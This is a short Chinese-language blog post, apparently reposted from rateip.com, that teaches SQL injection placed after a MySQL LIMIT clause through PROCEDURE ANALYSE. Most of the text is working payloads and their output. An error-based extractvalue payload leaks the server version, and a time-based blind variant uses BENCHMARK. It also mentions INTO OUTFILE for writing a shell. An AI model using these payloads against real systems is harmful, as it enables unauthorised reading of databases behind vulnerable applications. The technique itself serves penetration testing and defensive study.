MySQL 在 LIMIT 条件后注入

from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/

此方法适用于MySQL 5.x中，在limit语句后面的注入
例如：

1. SELECT
2. [ALL | DISTINCT | DISTINCTROW ]
3. [HIGH_PRIORITY]
4. [STRAIGHT_JOIN]
5. [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
6. [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
7. select_expr [, select_expr …]
8. [FROM table_references
9. [WHERE where_condition]
10. [GROUP BY {col_name | expr | position}
11. [ASC | DESC], … [WITH ROLLUP]]
12. [HAVING where_condition]
13. [ORDER BY {col_name | expr | position}
14. [ASC | DESC], …]
15. [LIMIT {[offset,] row_count | row_count OFFSET offset}]
16. [PROCEDURE procedure_name(argument_list)]
17. [INTO OUTFILE ‘file_name’ export_options
18. | INTO DUMPFILE ‘file_name’
19. | INTO var_name [, var_name]]
20. [FOR UPDATE | LOCK IN SHARE MODE]]

在LIMIT后面可以跟两个函数，PROCEDURE 和 INTO，INTO除非有写入shell的权限，否则是无法利用的，那么使用PROCEDURE函数能否注入呢？

Let’s give it a try:

1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
2. ERROR 1386 (HY000): Can’t use ORDER clause with this procedure

ANALYSE可以有两个参数：

1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
2. ERROR 1386 (HY000): Can’t use ORDER clause with this procedure

看起来并不是很好，继续尝试：
mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure
analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);
但是立即返回了一个错误信息：
ERROR 1108 (HY000): Incorrect parameters to procedure ‘analyse’
sleep函数肯定没有执行，但是最终我还是找到了可以攻击的方式：
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ‘:5.5.41-0ubuntu0.14.04.1′
如果不支持报错注入的话，还可以基于时间注入：
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1
PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
直接使用sleep不行，需要用BENCHMARK代替。

PS：测试成功，无图无真相：